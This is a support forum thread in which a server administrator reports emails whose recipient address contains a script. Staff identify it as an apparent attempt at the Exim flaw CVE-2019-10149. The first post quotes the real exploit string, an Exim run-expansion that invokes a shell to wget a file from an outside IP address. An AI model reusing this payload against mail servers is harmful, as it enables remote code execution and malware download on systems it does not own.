Script sent as email

m.eid

• July 11, 2019 15:19

Hi, I've received three emails in delivery reports where receiver email is a script root+${run{\x2fbin\x2fsh\t-c\t\x22wget\x20199.204.214.40\x2fsbz\x2f64.202.186.216\x22}}@hs01.domain.com
And the result column is "Permission denied: failed to chdir to /root" Does this a risk where I can do something? Any recommendations? *Note: We use ConfigServer scripts for exploitation and FrontEnd Mail Scanner where it topped it as High score Spam.

• 

  cPanelMichael

  • July 11, 2019 20:26

  Hello @m.eid, That looks like an attempt to take advantage of the exploit noted in and we'll take a look. Thank you.

  0
• 

  m.eid

  • July 12, 2019 02:17

  I have version 80.0.20 which I think is updated Exim, so no risk from these kind of scripts?

  0
• 

  cPanelMichael

  • July 12, 2019 16:47

  New I have version 80.0.20 which I think is updated Exim, so no risk from these kind of scripts?

  
  Hello @m.eid, Version 80.0.20 is protected against CVE-2019-10149 specifically. However, "no risk from these kind of scripts" is too broad a term when it comes to security. Here's a quote from our

  0

Please sign in to leave a comment.